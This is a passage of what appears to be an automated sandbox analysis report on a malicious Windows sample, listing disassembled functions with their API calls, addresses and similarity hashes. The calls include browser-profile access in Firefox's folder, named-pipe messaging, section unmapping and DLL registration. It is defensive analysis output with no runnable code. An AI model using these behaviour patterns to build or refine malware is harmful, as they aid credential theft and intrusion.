  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5816, Relevance: 10.6, APIs: 7, Instructions: 109 Total matches: 43stringsleepmemory
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2A39, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102 Total matches: 43memory
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5C23, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59 Total matches: 27stringtime
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6C08, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141 Total matches: 19registrysynchronization
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
